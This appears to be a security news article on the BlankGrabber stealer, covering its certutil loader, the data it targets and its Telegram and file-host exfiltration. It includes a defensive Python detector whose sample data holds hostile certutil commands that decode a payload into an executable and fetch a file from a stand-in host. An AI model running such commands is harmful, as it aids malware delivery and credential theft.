XWorm and BlankGrabber Trojan Stealer | Image: Splunk Threat Research Team
A deep-dive analysis by the Splunk Threat Research Team (STRT) has shed light on BlankGrabber, a Python-based information stealer that is quickly becoming a favorite among cybercriminals for its modularity and low-profile operations.
Masquerading as everything from “cracked” software to legitimate GitHub utilities, BlankGrabber is a master of disguise designed to strip a victim’s digital life bare in seconds.
BlankGrabber doesn’t rely on complex exploits to enter a system; instead, it exploits human trust. It is primarily distributed through social engineering and phishing campaigns, often hiding in plain sight within Discord archives or weaponized GitHub repositories.
One particularly clever variant analyzed by STRT was found hosted on the Gofile[.]io file-sharing platform. This version utilizes a multi-stage loader that uses a built-in Windows utility, certutil.exe, to decode and install its malicious payload under the guise of a system certificate.
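The loader technique described above leaves a recognisable trace in process-creation telemetry: certutil.exe, a certificate-management tool, being invoked to decode or fetch a file. The check below is an added example written for this article, not STRT's published detection; the Sysmon-style field names and the sample records are constructed.

```python
import shlex
from dataclasses import dataclass
from typing import Optional

# Constructed Sysmon-style process-creation records; sample data, not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\update.crt C:\Users\Public\svc.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f https://example.invalid/x.crt C:\Temp\x.crt"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\corp-root.cer"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\me\notes.txt"},
]

DECODE_FLAGS = {"-decode", "-decodehex"}
DOWNLOAD_FLAGS = {"-urlcache"}
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")

@dataclass
class Finding:
    severity: str   # "high" or "medium"
    reason: str
    cmdline: str

def inspect_event(event: dict) -> Optional[Finding]:
    """Flag certutil.exe runs that decode or fetch content instead of managing certificates."""
    if not event["image"].lower().endswith("\\certutil.exe"):
        return None
    # posix=False keeps Windows backslash paths intact while still honouring quoted arguments
    args = shlex.split(event["cmdline"], posix=False)
    flags = {a.lower() for a in args[1:] if a.startswith("-")}
    positional = [a.strip('"') for a in args[1:] if not a.startswith("-")]
    if flags & DECODE_FLAGS:
        # certutil -decode <infile> <outfile>: a decoded executable is the loader pattern
        if positional and positional[-1].lower().endswith(EXEC_SUFFIXES):
            return Finding("high", "certutil decoded a blob into an executable", event["cmdline"])
        return Finding("medium", "certutil -decode outside certificate handling", event["cmdline"])
    if flags & DOWNLOAD_FLAGS and any(a.lower().startswith(("http://", "https://")) for a in positional):
        return Finding("medium", "certutil used to fetch a remote file", event["cmdline"])
    return None

def scan(events: list) -> list:
    # Return one Finding per suspicious event, preserving input order
    return [f for f in (inspect_event(e) for e in events) if f is not None]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.reason}: {f.cmdline}")
```

Legitimate certificate operations such as `-verify` on a `.cer` file pass through untouched, so the rule keys on what certutil is asked to do rather than on its mere presence.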
Once BlankGrabber establishes a foothold, its modular architecture allows it to pivot and target a wide array of sensitive information. Its primary mission is the exfiltration of:
- Browser Secrets: Saved credentials and session tokens that can grant attackers access to sensitive accounts without needing a password.
- System Metadata: Detailed information about the compromised host to help attackers plan further lateral movement.
- Discord Tokens: Allowing attackers to hijack accounts and spread the infection further through trusted communities.
“BlankGrabber is a Python-based information stealer engineered to exfiltrate sensitive data… the malware has gained notoriety for its modular architecture and rapid development cycle, designed specifically to maintain a low footprint and bypass traditional detection mechanisms,” the analysis explains.
BlankGrabber is remarkably flexible in how it sends stolen data back to its masters. STRT researchers identified two primary methods used by the malware to bypass network security:
- Telegram Bot C2: The malware often features an encoded Telegram bot ID embedded directly in its configuration, allowing it to send data over a legitimate communication protocol.
- Public Web Services: If standard channels are blocked, BlankGrabber can leverage public hosting platforms like Gofile[.]io and Anonfiles to upload archives of stolen data.
To ensure the stolen data remains inaccessible to security researchers, the malware often packages the harvested information into a password-protected archive. As seen in the technical breakdown, it uses hardcoded passwords such as blank123 to lock the collected data before exfiltration.

The most dangerous aspect of BlankGrabber is its “rapid development cycle”. The authors are constantly refining the code to stay one step ahead of antivirus signatures and behavioral detections.